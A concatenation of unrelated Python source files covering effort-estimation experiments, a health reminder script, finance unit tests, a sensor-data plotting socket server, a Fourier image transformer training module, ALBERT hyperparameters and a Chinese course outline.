== 0: mmre = np.mean(mre) return mmre def sa_calc(y_predict, y_actual): ar = 0 for predict, actual in zip(y_predict, y_actual): ar += abs(predict - actual) mar = ar / (len(y_predict)) marr = sum(y_actual) / len(y_actual) sa_error = (1 - mar / marr) return sa_error def run(reps=1): for dataset_class in datasets: dataset = dataset_class() model_scores = {"CART": N(), "PEEKING": N(), "TEAK": N(), "KNN1": N(), "KNN3": N(), "ATLM": N(), "COGEE": N(), "O_TEAK": N() } for score in model_scores.values(): score.go = True for _ in xrange(reps): for test, rest in kfold(dataset.get_rows(), 3, shuffle=True): say(".") desired_effort = [dataset.effort(row) for row in test] all_efforts = [dataset.effort(one) for one in rest] model_scores["PEEKING"] += error(desired_effort, peeking2(dataset, test, rest), all_efforts) model_scores["CART"] += error(desired_effort, cart(dataset, test, rest), 
all_efforts) model_scores["TEAK"] += error(desired_effort, teak(dataset, test, rest), all_efforts) model_scores["KNN1"] += error(desired_effort, knn_1(dataset, test, rest), all_efforts) model_scores["KNN3"] += error(desired_effort, knn_3(dataset, test, rest), all_efforts) model_scores["ATLM"] += error(desired_effort, atlm(dataset, test, rest), all_efforts) model_scores["COGEE"] += error(desired_effort, cogee(dataset, test, rest), all_efforts) model_scores["O_TEAK"] += error(desired_effort, teak_optimize(dataset, test, rest), all_efforts) sk_data = [[key] + n.cache.all for key, n in model_scores.items()] print("\n### %s (%d projects, %d decisions)" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) print("```") sk.rdivDemo(sk_data) print("```") print("") def run_for_dataset(dataset_class, dataset_id, reps): write_file = "results/%s_sa_mre.txt" % dataset_class.__name__ with open(write_file, "wb") as f: dataset = dataset_class() dataset_name = dataset_class.__name__ print("\n### %s (%d projects, %d decisions)" % (dataset_name, len(dataset.get_rows()), len(dataset.dec_meta))) # folds = 3 if len(dataset.get_rows()) < 40 else 10 folds = 3 for rep in range(reps): fold_id = 0 for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): print("Running for %s, rep = %d, fold = %d" % (dataset_name, rep + 1, fold_id)) fold_id += 1 all_efforts = [dataset.effort(one) for one in rest] actual_efforts = [dataset.effort(row) for row in test] start = time() atlm_efforts = atlm(dataset, test, rest) atlm_end = time() cart_efforts = cart(dataset, test, rest) cart_end = time() cogee_efforts = cogee(dataset, test, rest) cogee_end = time() atlm_mre, atlm_sa = mre_calc(atlm_efforts, actual_efforts), msa(actual_efforts, atlm_efforts, all_efforts) cart_mre, cart_sa = mre_calc(cart_efforts, actual_efforts), msa(actual_efforts, cart_efforts, all_efforts) cogee_mre, cogee_sa = mre_calc(cogee_efforts, actual_efforts), msa(actual_efforts, cogee_efforts, all_efforts) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 1, atlm_mre, atlm_sa, atlm_end - start)) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 2, cart_mre, cart_sa, cart_end - start)) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 3, cogee_mre, cogee_sa, cogee_end - start)) return write_file def run_patrick(reps, num_cores, consolidated_file="results/patrick_sa_mre.txt"): local_datasets = datasets # local_datasets = [Miyazaki] dataset_files = Parallel(n_jobs=num_cores)(delayed(run_for_dataset)(dataset_class, dataset_id, reps) for dataset_id, dataset_class in enumerate(local_datasets)) with open(consolidated_file, "wb") as f: f.write("dataset;method;SA;MRE;Runtime\n") for dataset_file in dataset_files: with open(dataset_file) as df: for line in df.readlines(): if len(line) > 0: f.write("%s" % line) # os.remove(dataset_file) def sarro_cogee_dataset(dataset_class, error, folds, reps): dataset = dataset_class() print("\n### %s (%d projects, %d decisions)" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) model_scores = {"CART": N(), "ATLM": N(), "COGEE": N() } for score in model_scores.values(): score.go = True for _ in range(reps): for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): say(".") desired_effort = [dataset.effort(row) for row in test] all_efforts = [dataset.effort(one) for one in rest] model_scores["CART"] += error(desired_effort, cart(dataset, test, rest), all_efforts) model_scores["ATLM"] += error(desired_effort, atlm(dataset, test, rest), all_efforts) model_scores["COGEE"] += error(desired_effort, 
cogee(dataset, test, rest), all_efforts) sk_data = [[key] + n.cache.all for key, n in model_scores.items()] print("```") stat = sk.rdivDemo(sk_data) print("```") print("") write_file = "%s/%s.txt" % ("results/sarro", dataset_class.__name__) with open(write_file, "wb") as f: f.write("\n### %s (%d projects, %d decisions)\n" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) f.write("```\n%s\n```\n\n" % stat) return write_file def sarro_cogee(num_cores, folds=3, reps=10): datasets = [China, Desharnais, Finnish, Maxwell, Miyazaki, Albrecht, Kemerer, ISBSG10, Kitchenhamm] # datasets = [Miyazaki, Finnish] mkdir("results/sarro") error = msa dataset_files = Parallel(n_jobs=num_cores)(delayed(sarro_cogee_dataset)(dataset_class, error, folds, reps) for dataset_id, dataset_class in enumerate(datasets)) consolidated_file = "results/sarro/sa.md" with open(consolidated_file, "wb") as f: for dataset_file in dataset_files: with open(dataset_file) as df: for line in df.readlines(): f.write(line) def run_patrick_v2(): reps = 20 folds = 3 contents = [] for dataset_class in datasets: dataset = dataset_class() dataset_name = dataset_class.__name__ start = time() atlm_mres, atlm_sas = [], [] for rep in range(reps): fold_id = 0 for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): print("Running for %s, rep = %d, fold = %d" % (dataset_name, rep + 1, fold_id)) fold_id += 1 all_efforts = [dataset.effort(one) for one in rest] actual_efforts = [dataset.effort(row) for row in test] atlm_efforts = atlm(dataset, test, rest) atlm_mre, atlm_sa = mre_calc(atlm_efforts, actual_efforts), msa(actual_efforts, atlm_efforts, all_efforts) atlm_mres.append(atlm_mre) atlm_sas.append(atlm_sa) end = time() content = "dataset: %s\ntotal runtime: %f\n" % (dataset_name, end - start) content += "\nMRE\n" + " ".join(map(str, atlm_mres)) + "\n" content += "\nSA\n" + " ".join(map(str, atlm_sas)) + "\n" contents.append(content) with open("results/patrick_sa_mre_v2.txt", "wb") as f: f.write("\n########################################\n\n".join(contents)) def _sarro(): reps = 10 folds = 3 cores = 16 sarro_cogee(cores, folds, reps) def _main(): # reps = 20 # cores = 16 # consolidated_file = "results/patrick_sa_mre_v2.txt" # run_patrick(reps, cores, consolidated_file) run_patrick_v2() if __name__ == "__main__": _main() # _sarro() from pygame import init, mixer import pygame pygame.init() from datetime import datetime from time import time def musicloop(file , stopword): mixer.init() pygame.mixer.music.load(file) mixer.music.play(15) while True: a=input() if a==stopword: mixer.music.stop() break def detailkeeper(message): with open("My Details.txt" , "a") as f: f.write(f"You - {message} - At - {datetime.now()}\n\n") if __name__== '__main__': print("ENTER YOUR REQUIRED DURATION BELOW IN Seconds \n\n") water_duration =int(input("\nWater Duration\n")) eye_duration = int(input("\nEye Relax Duration\n")) exercise_duration = int(input("\nExercise Duration\n")) init_water = time() init_eye = time() init_exercise = time() while True: if time() - init_water > water_duration: print("\n\nWater Drinking Time Dude.\nEnter 'drank' to stop the remainder") musicloop('water.mp3' , 'drank') init_water= time() detailkeeper("Drank Water") elif time() - init_eye > eye_duration: print("\n\nEye Relaxing Time Dude.\nEnter 'done' to stop the remainder") musicloop('eye.mp3' , 'done') init_eye= time() detailkeeper("Eye Relaxed") elif time() - init_exercise > exercise_duration: print("\n\nExercise Time Dude.\nEnter 'done' to stop the 
remainder") musicloop('exercise.mp3' , 'done') init_exercise= time() detailkeeper("Exercised") """ Unit tests for `interest` module Copyright (c) 2014, 2015 <NAME> license http://opensource.org/licenses/MIT """ import sys import unittest import pynance as pn class TestInterest(unittest.TestCase): def test_yrlygrowth(self): # growth of 8 over 3 years means annual growth of 2 self.assertAlmostEqual(pn.interest.yrlygrowth(8, 3), 2.0) def test_yrlyret(self): # interest of 2.0 over .5 yrs means growth of 3.0 # so annual muliple of 9.0 and interest of 8.0 self.assertAlmostEqual(pn.interest.yrlyret(2, 0.5), 8.0) def test_compgrowth(self): # compound an annual growth of 16.0 over 0.5 yrs self.assertAlmostEqual(pn.interest.compgrowth(16.0, 0.5), 4.0) def test_compret(self): # compound annual interest of 0.1 over 25 years self.assertAlmostEqual(pn.interest.compret(0.1, 25), 9.83, places=2) def test_pvannuity(self): # 15% return for 5 years self.assertAlmostEqual(pn.interest.pvannuity(0.15, 5), 3.352, places=3) # 10 payments of 10k at 18% self.assertAlmostEqual(pn.interest.pvannuity(.18, 10, 10000.), 44941., places=0) def test_loanpayment(self): # 15% interest with 5 yrly payments for a loan of 1000 self.assertAlmostEqual(pn.interest.loanpayment(1000., 0.15, 5), 298.32, places=2) def test_growthfromrange(self): # 15% return from 2014-01-12 to 2015-06-30 self.assertAlmostEqual(pn.interest.growthfromrange(1.15, '2014-01-12', '2015-06-30'), 1.100314) def test_retfromrange(self): # 15% return from 1999-12-01 to 2000-03-15 self.assertAlmostEqual(pn.interest.retfromrange(.15, '1999-12-01', '2000-03-15'), .626079, places=6) def test_growthtocont(self): # 10% annual return self.assertAlmostEqual(pn.interest.growthtocont(1.1), .0953102) def test_conttogrowth(self): # 10% continuous self.assertAlmostEqual(pn.interest.conttogrowth(.1), 1.1051709) if __name__ == '__main__': unittest.main() __author__ = 'zhengwang' import csv import socket import time import math import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.patches import Ellipse, Circle class SensorStreamingTest(object): def __init__(self): self.server_socket = socket.socket() self.server_socket.bind(('192.168.1.123', 8002)) #computer's ip self.server_socket.listen(0) self.connection, self.client_address = self.server_socket.accept() self.streaming() def streaming(self): try: print "Connection from: ", self.client_address start = time.time() plt.ion() fig = plt.figure() while True: sensor_data = self.connection.recv(1024).split(',') # print sensor_data test = sensor_data[2].split('.')[0] sensor_data[2] = test print "Distance1: %0.1f cm; Distance2: %0.1f cm; Distance3: %0.1f cm" % (float(sensor_data[0]),float(sensor_data[1]),float(sensor_data[2])) print "time %0.2f s" % float(time.time()-start) #for i in range(len(list)): # for i in range(350,400): # print list[i], i # sensor_data = list[i] x1,x2,x3,x6,x7,x8 = [],[],[],[],[],[] y1,y2,y3,y4,y5,y6,y7,y8,y9,y10,y11 = [],[],[],[],[],[],[],[],[],[],[] if float(sensor_data[0]) < 30.7: x1.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#red point y1.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) x6.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#red line y6.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) elif float(sensor_data[0]) < 53: x2.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#blue point y2.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) y9.append(12.5+float(sensor_data[0])*math.sqrt(2)/2)#green line else: # x2.append(-7.5-100*math.sqrt(2)/2) # 
y2.append(12.5+100*math.sqrt(2)/2) y3.append(99)#green line if float(sensor_data[2]) < 30.7: x1.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#red point y1.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) x7.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#red line y7.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) elif float(sensor_data[2]) < 53: x2.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#blue point y2.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) y10.append(12.5+float(sensor_data[2])*math.sqrt(2)/2)#green line else: # x2.append(-7.5+100*math.sqrt(2)/2) # y2.append(12.5+100*math.sqrt(2)/2) y4.append(99)#green line if float(sensor_data[1]) < 32.5: x1.append(0)#red point y1.append(12.5+float(sensor_data[1])) y8.append(12.5+float(sensor_data[1]))#red line elif float(sensor_data[1]) < 100: x2.append(0)#blue point y2.append(12.5+float(sensor_data[1])) y11.append(12.5+float(sensor_data[1]))#green line else: x2.append(0) y2.append(99) y5.append(99) ax = fig.add_subplot(111,facecolor='black') cir1 = Circle(xy = (0.0, 0.0), radius=45, alpha=0.3, color='white') ax.add_patch(patches.Rectangle((-7.5, -12.5), 15, 25)) ax.add_patch(cir1) plt.plot([-15,-15,-15],[-100,0,100],color = 'white', lw = 3) plt.plot([15,15,15],[-100,0,100],color = 'white', lw = 3) plt.plot([45,45,45],[-100,0,100],color = 'white', lw = 3) plt.plot([-45,-45,-45],[-100,0,100],color = 'white', lw = 3) if len(y3) > 0: plt.plot([-45,-30,-15],[y3[0],y3[0],y3[0]],color = '#ADFF2F', lw = 3) if len(y4) > 0: plt.plot([15,30,45],[y4[0],y4[0],y4[0]],color = '#ADFF2F', lw = 3) if len(y5) > 0: plt.plot([-15,0,15],[y5[0],y5[0],y5[0]],color = '#ADFF2F', lw = 3) if len(y6) > 0: plt.plot([-40,-30,-20],[y6[0],y6[0],y6[0]],color = 'red', lw = 3) if len(y7) > 0: plt.plot([20,30,40],[y7[0],y7[0],y7[0]],color = 'red', lw = 3) if len(y8) > 0: plt.plot([-10,0,10],[y8[0],y8[0],y8[0]],color = 'red', lw = 3) if len(y9) > 0: plt.plot([-45,-30,-15],[y9[0],y9[0],y9[0]],color = '#ADFF2F', lw = 3) if len(y10) > 0: plt.plot([15,30,45],[y10[0],y10[0],y10[0]],color = '#ADFF2F', lw = 3) if len(y11) > 0: plt.plot([-15,0,15],[y11[0],y11[0],y11[0]],color = '#ADFF2F', lw = 3) plt.axis('scaled') #plt.axis('equal') plt.axis([-75,75,-100,100]) plt.axis([-75,75,-100,100]) plt.scatter(x1,y1,marker='x',color='red') plt.scatter(x2,y2) # filename = "%d.png" %i # plt.savefig(filename) plt.draw() plt.pause(0.01) plt.clf() # testing for 30 seconds # if time.time() - start > 300: # csvfile.close() # break finally: self.connection.close() self.server_socket.close() if __name__ == '__main__': SensorStreamingTest()<reponame>rayanirban/FourierImageTransformer import torch from pytorch_lightning import LightningModule from torch.optim.lr_scheduler import ReduceLROnPlateau from fit.modules.loss import _fc_prod_loss, _fc_sum_loss from fit.transformers.TRecTransformer import TRecTransformer, TRecOnlyFBP, TRecOnlyConvBlock from fit.utils import PSNR, convert2DFT, psf_rfft from fit.utils.RAdam import RAdam import numpy as np from torch.nn import functional as F import torch.fft from fit.utils.utils import denormalize, denormalize_amp, denormalize_phi, denormalize_FC class TRecTransformerModule(LightningModule): def __init__(self, d_model, sinogram_coords, target_coords, src_flatten_coords, dst_flatten_coords, dst_order, angles, img_shape=27, detector_len=27, loss='prod', use_fbp=True, init_bin_factor=4, bin_factor_cd=10, lr=0.0001, weight_decay=0.01, attention_type="linear", n_layers=4, n_heads=4, d_query=4, dropout=0.1, attention_dropout=0.1, only_FBP=False, 
only_convblock=False, d_conv=8): super().__init__() self.save_hyperparameters("d_model", "img_shape", "bin_factor_cd", "init_bin_factor", "detector_len", "loss", "use_fbp", "lr", "weight_decay", "attention_type", "n_layers", "n_heads", "d_query", "dropout", "attention_dropout", "only_FBP", "only_convblock", "d_conv") self.sinogram_coords = sinogram_coords self.target_coords = target_coords if not type(src_flatten_coords) is torch.Tensor: self.src_flatten_coords = torch.from_numpy(src_flatten_coords) else: self.src_flatten_coords = src_flatten_coords if not type(dst_flatten_coords) is torch.Tensor: self.dst_flatten_order = torch.from_numpy(dst_flatten_coords) else: self.dst_flatten_order = dst_flatten_coords self.dst_order = dst_order self.angles = angles self.num_angles = len(self.angles) self.dft_shape = (img_shape, img_shape // 2 + 1) self.bin_factor = init_bin_factor self.bin_count = 0 self.best_mean_val_mse = 9999999 self.bin_factor_patience = 10 self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=img_shape)) if loss == 'prod': self.loss = _fc_prod_loss else: self.loss = _fc_sum_loss if not self.hparams.use_fbp: self.register_buffer('zero_cond', torch.zeros(1, self.dst_flatten_order.shape[0], 2, dtype=torch.float32)) else: self.zero_cond = None if only_convblock: self.trec = TRecOnlyConvBlock(d_conv=d_conv) elif only_FBP: self.trec = TRecOnlyFBP(d_model=self.hparams.d_model, coords_target=self.target_coords, flatten_order_target=self.dst_flatten_order, attention_type=self.hparams.attention_type, n_layers=self.hparams.n_layers, n_heads=self.hparams.n_heads, d_query=self.hparams.d_query, dropout=self.hparams.dropout, attention_dropout=self.hparams.attention_dropout, d_conv=d_conv) else: self.trec = TRecTransformer(d_model=self.hparams.d_model, coords_sinogram=self.sinogram_coords, flatten_order_sinogram=self.src_flatten_coords, coords_target=self.target_coords, flatten_order_target=self.dst_flatten_order, attention_type=self.hparams.attention_type, n_layers=self.hparams.n_layers, n_heads=self.hparams.n_heads, d_query=self.hparams.d_query, dropout=self.hparams.dropout, attention_dropout=self.hparams.attention_dropout, d_conv=d_conv) x, y = torch.meshgrid(torch.arange(-self.hparams.img_shape // 2 + 1, self.hparams.img_shape // 2 + 1), torch.arange(-self.hparams.img_shape // 2 + 1, self.hparams.img_shape // 2 + 1)) self.register_buffer('circle', torch.sqrt(x ** 2. + y ** 2.) 
<= self.hparams.img_shape // 2) def forward(self, x, out_pos_emb): return self.trec.forward(x, out_pos_emb) def configure_optimizers(self): optimizer = RAdam(self.trec.parameters(), lr=self.hparams.lr, weight_decay=self.hparams.weight_decay) scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, verbose=True) return { 'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'Train/avg_val_mse' } def _real_loss(self, pred_img, target_fc, amp_min, amp_max): dft_target = convert2DFT(x=target_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) if self.bin_factor > 1: dft_target *= self.mask y_target = torch.roll(torch.fft.irfftn(dft_target, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return F.mse_loss(pred_img, y_target) def _fc_loss(self, pred_fc, target_fc, amp_min, amp_max): pred_amp = denormalize_amp(pred_fc[..., 0], amp_min=amp_min, amp_max=amp_max) target_amp = denormalize_amp(target_fc[..., 0], amp_min=amp_min, amp_max=amp_max) pred_phi = denormalize_phi(pred_fc[..., 1]) target_phi = denormalize_phi(target_fc[..., 1]) amp_loss = 0 + torch.pow(pred_amp - target_amp, 2) phi_loss = 1 - torch.cos(pred_phi - target_phi) return torch.mean(amp_loss + phi_loss), torch.mean(amp_loss), torch.mean(phi_loss) def criterion(self, pred_fc, pred_img, target_fc, amp_min, amp_max): if self.hparams.only_convblock: return self._real_loss(pred_img=pred_img, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max), torch.tensor(0.0), torch.tensor(0.0) else: fc_loss, amp_loss, phi_loss = self.loss(pred_fc=pred_fc, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max) real_loss = self._real_loss(pred_img=pred_img, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max) return fc_loss + real_loss, amp_loss, phi_loss def _bin_data(self, x_fc, fbp_fc, y_fc): shells = (self.hparams.detector_len // 2 + 1) / self.bin_factor num_sino_fcs = np.clip(self.num_angles * int(shells + 1), 1, x_fc.shape[1]) if self.bin_factor > 1: num_target_fcs = np.sum(self.dst_order <= shells) else: num_target_fcs = fbp_fc.shape[1] x_fc_ = x_fc[:, self.src_flatten_coords][:, :num_sino_fcs] if self.hparams.use_fbp: fbp_fc_ = fbp_fc[:, self.dst_flatten_order][:, :num_target_fcs] else: fbp_fc_ = self.zero_cond[:, self.dst_flatten_order][:, :num_target_fcs] fbp_fc_ = torch.repeat_interleave(fbp_fc_, x_fc.shape[0], dim=0) y_fc_ = y_fc[:, self.dst_flatten_order][:, :num_target_fcs] return x_fc_, fbp_fc_, y_fc_ def training_step(self, batch, batch_idx): x_fc, fbp_fc, y_fc, y_real, (amp_min, amp_max) = batch x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y_fc) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) fc_loss, amp_loss, phi_loss = self.criterion(pred_fc, pred_img, y_fc_, amp_min, amp_max) return {'loss': fc_loss, 'amp_loss': amp_loss, 'phi_loss': phi_loss} def training_epoch_end(self, outputs): loss = [d['loss'] for d in outputs] amp_loss = [d['amp_loss'] for d in outputs] phi_loss = [d['phi_loss'] for d in outputs] self.log('Train/loss', torch.mean(torch.stack(loss)), logger=True, on_epoch=True) self.log('Train/amp_loss', torch.mean(torch.stack(amp_loss)), logger=True, on_epoch=True) self.log('Train/phi_loss', torch.mean(torch.stack(phi_loss)), logger=True, on_epoch=True) def _gt_bin_mse(self, y_fc, y_real, amp_min, amp_max): dft_y = convert2DFT(x=y_fc, amp_min=amp_min, 
amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) y_hat = torch.roll(torch.fft.irfftn(dft_y, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return F.mse_loss(y_hat, y_real) def _val_psnr(self, pred_img, y_real): pred_img_norm = denormalize(pred_img, self.trainer.datamodule.mean, self.trainer.datamodule.std) y_real_norm = denormalize(y_real, self.trainer.datamodule.mean, self.trainer.datamodule.std) psnrs = [] for i in range(len(pred_img_norm)): gt = self.circle * y_real_norm[i] psnrs.append(PSNR(gt, self.circle * pred_img_norm[i], drange=gt.max() - gt.min())) return torch.mean(torch.stack(psnrs)) def validation_step(self, batch, batch_idx): x_fc, fbp_fc, y_fc, y_real, (amp_min, amp_max) = batch x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y_fc) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) val_loss, amp_loss, phi_loss = self.criterion(pred_fc, pred_img, y_fc_, amp_min, amp_max) val_mse = F.mse_loss(pred_img, y_real) val_psnr = self._val_psnr(pred_img, y_real) bin_mse = self._gt_bin_mse(y_fc_, y_real, amp_min=amp_min, amp_max=amp_max) self.log_dict({'val_loss': val_loss}) self.log_dict({'val_mse': val_mse}) self.log_dict({'val_psnr': val_psnr}) self.log_dict({'bin_mse': bin_mse}) if batch_idx == 0: self.log_val_images(pred_img, fbp_fc[:, self.dst_flatten_order], y_fc_, y_real, amp_min, amp_max) return {'val_loss': val_loss, 'val_mse': val_mse, 'val_psnr': val_psnr, 'bin_mse': bin_mse, 'amp_loss': amp_loss, 'phi_loss': phi_loss} def log_val_images(self, pred_img, fbp_fc, y_fc, y_real, amp_min, amp_max): dft_fbp = convert2DFT(x=fbp_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) dft_target = convert2DFT(x=y_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) for i in range(min(3, len(pred_img))): if self.bin_factor == 1: fbp_img = torch.roll(torch.fft.irfftn(self.mask * dft_fbp[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) y_img = y_real[i] else: fbp_img = torch.roll(torch.fft.irfftn(self.mask * dft_fbp[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) y_img = torch.roll(torch.fft.irfftn(self.mask * dft_target[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) fbp_img = torch.clamp((fbp_img - fbp_img.min()) / (fbp_img.max() - fbp_img.min()), 0, 1) pred_img_ = pred_img[i] pred_img_ = torch.clamp((pred_img_ - pred_img_.min()) / (pred_img_.max() - pred_img_.min()), 0, 1) y_img = torch.clamp((y_img - y_img.min()) / (y_img.max() - y_img.min()), 0, 1) self.trainer.logger.experiment.add_image('inputs/img_{}'.format(i), fbp_img.unsqueeze(0), global_step=self.trainer.global_step) self.trainer.logger.experiment.add_image('predcitions/img_{}'.format(i), pred_img_.unsqueeze(0), global_step=self.trainer.global_step) self.trainer.logger.experiment.add_image('targets/img_{}'.format(i), y_img.unsqueeze(0), global_step=self.trainer.global_step) def _is_better(self, mean_val_mse): return mean_val_mse < self.best_mean_val_mse * (1. 
- 0.0001) def validation_epoch_end(self, outputs): val_loss = [o['val_loss'] for o in outputs] val_mse = [o['val_mse'] for o in outputs] val_psnr = [o['val_psnr'] for o in outputs] bin_mse = [o['bin_mse'] for o in outputs] amp_loss = [d['amp_loss'] for d in outputs] phi_loss = [d['phi_loss'] for d in outputs] mean_val_mse = torch.mean(torch.stack(val_mse)) mean_val_psnr = torch.mean(torch.stack(val_psnr)) bin_factor_threshold = torch.mean(torch.stack(bin_mse)) * self.bin_factor if self._is_better(mean_val_mse): self.best_mean_val_mse = mean_val_mse self.bin_factor_patience = 10 else: self.bin_factor_patience -= 1 reduce_bin_factor = (self.bin_factor_patience < 1) or ( self.bin_count > self.hparams.bin_factor_cd and mean_val_mse < bin_factor_threshold) if reduce_bin_factor and self.bin_factor > 1: self.bin_count = 0 self.bin_factor_patience = 10 self.best_mean_val_mse = mean_val_mse self.bin_factor = max(1, self.bin_factor // 2) self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=self.hparams.img_shape).to(self.device)) print('Reduced bin_factor to {}.'.format(self.bin_factor)) if self.bin_factor > 1: self.trainer.lr_schedulers[0]['scheduler']._reset() self.bin_count += 1 if self.bin_factor > 1: self.trainer.lr_schedulers[0]['scheduler']._reset() self.log('Train/avg_val_loss', torch.mean(torch.stack(val_loss)), logger=True, on_epoch=True) self.log('Train/avg_val_mse', mean_val_mse, logger=True, on_epoch=True) self.log('Train/avg_val_psnr', mean_val_psnr, logger=True, on_epoch=True) self.log('Train/avg_bin_mse', bin_factor_threshold, logger=True, on_epoch=True) self.log('Train/avg_val_amp_loss', torch.mean(torch.stack(amp_loss)), logger=True, on_epoch=True) self.log('Train/avg_val_phi_loss', torch.mean(torch.stack(phi_loss)), logger=True, on_epoch=True) def test_step(self, batch, batch_idx): x_fc, fbp_fc, y, y_real, (amp_min, amp_max) = batch assert len(x_fc) == 1, 'Test images have to be evaluated independently.' 
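        # Test-time evaluation always uses the full set of Fourier coefficients,
        # so any bin_factor left over from training is reset to 1 below.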
if self.bin_factor != 1: print('bin_factor set to 1.') self.bin_factor = 1 x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y) _, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) gt = denormalize(y_real[0], self.trainer.datamodule.mean, self.trainer.datamodule.std) pred_img = denormalize(pred_img[0], self.trainer.datamodule.mean, self.trainer.datamodule.std) gt = self.circle * gt return PSNR(gt, self.circle * pred_img, drange=gt.max() - gt.min()) def test_epoch_end(self, outputs): outputs = torch.stack(outputs) print(torch.mean(outputs).detach().cpu().numpy()) self.log('Mean PSNR', torch.mean(outputs), logger=True) self.log('SEM PSNR', torch.std(outputs / np.sqrt(len(outputs))), logger=True) def get_imgs(self, x, fbp, y, amp_min, amp_max): self.eval() self.bin_factor = 1 self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=self.hparams.img_shape).to(self.device)) x_fc_, fbp_fc_, y_fc_ = self._bin_data(x, fbp, y) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) tmp = denormalize_FC(pred_fc, amp_min=amp_min, amp_max=amp_max) pred_fc_ = torch.ones(x.shape[0], self.hparams.img_shape * (self.hparams.img_shape // 2 + 1), dtype=x.dtype, device=x.device) pred_fc_[:, :tmp.shape[1]] = tmp dft_pred_fc = convert2DFT(x=pred_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) img_pred_before_conv = torch.roll(torch.fft.irfftn(dft_pred_fc, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return pred_img, img_pred_before_conv <filename>hps.py from types import SimpleNamespace _common = { 'seed': 123, # not implemented 'nb_workers': 8, 'seq_len': 512, 'chunk_size': 1024, } _pretrain = { 'save_frequency': 5_000, 'test_size': 0.1, 'batch_size': 1024, 'mini_batch_size': 8, # be a multiple of 8 'learning_rate': 1e-4, 'mask_prob': .15, 'nb_updates': 125_000, 'nb_train_batches': 32, 'nb_eval_batches': 4, } _albert_shared = { 'embedding_dim': 128, 'nb_heads': 8, 'head_dim': 64, 'layer_norm': True, 'attention_type': 'nystrom', } _albert_base = { 'mlp_dim': 768, 'nb_layers': 6, 'dropout': 0.1, } _albert_large = { 'mlp_dim': 1024, 'nb_layers': 24, 'dropout': 0.1, } _albert_xlarge = { 'mlp_dim': 2048, 'nb_layers': 24, 'dropout': 0.0, } HPS = { ('pretrain', 'base'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_base)), ('pretrain', 'large'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_large)), ('pretrain', 'xlarge'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_xlarge)), } <reponame>HuangHuaBingZiGe/GitHub-Demo #!/usr/bin/python # -*- coding: utf-8 -*- """ 50个话题 9章 1.课程简介 2.数据结构相关话题 3.迭代器与生成器相关话题 4.字符串处理相关话题 5.文件I/O操作相关话题 6.数据编码与处理相关话题 7.类与对象相关话题 8.多线程与多进程相关话题 9.装饰器相关话题 """ """ 第1章 课程简介 1-1 课程简介 1-2 在线编码工具WebIDE使用指南 第2章 数据结构与算法进阶训练 2-1 如何在列表, 字典, 集合中根据条件筛选数据 2-2 如何为元组中的每个元素命名, 提高程序可读性 2-3 